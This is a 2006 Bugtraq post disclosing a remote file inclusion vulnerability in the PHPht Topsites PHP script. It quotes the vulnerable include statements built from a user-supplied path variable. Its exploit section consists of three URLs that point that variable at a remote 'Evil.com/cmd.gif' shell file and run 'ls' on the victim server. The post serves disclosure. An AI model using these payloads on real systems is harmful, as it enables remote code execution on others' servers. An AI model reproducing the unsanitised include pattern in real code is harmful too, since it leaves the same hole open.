
Date: 12 Oct 2006 23:20:56 -0000
From: By_KorsaN_Son@...mail.com
To: bugtraq@...urityfocus.com
Subject: PHPht Topsites Remote File &#304;nclude

# BiyoSecurity.Org & SecurityWall.Org

# Scripts: PHPht Topsites Remote File &#304;nclude

# Download: http://www.linkini.net/phpscripts/descargas/Top%20Sites%20(8%20Archivos)/PHPht%20Topsites.zip

# Greetz : Liz0zim , RMx , TR_IP , DreamLord

# Regards : KorsaN

# Vulnerable file :

All Files :=)

#vulnerable code : 

include($phpht_real_path . 'extension.inc');

include($phpht_real_path . 'common.'.$phpEx);



#Exploit :


http://www.victim.com/[PATH TO SCR&#304;PT]/index.php?phpht_real_path=http://Evil.com/cmd.gif?&cmd=ls

http://www.victim.com/[PATH TO SCR&#304;PT]/[F&#304;LENAME].php?phpht_real_path=http://Evil.com/cmd.gif?&cmd=ls

http://www.victim.com/[PATH TO SCR&#304;PT]/admin/[F&#304;LENAME].php?phpht_real_path=http://Evil.com/cmd.gif?&cmd=ls
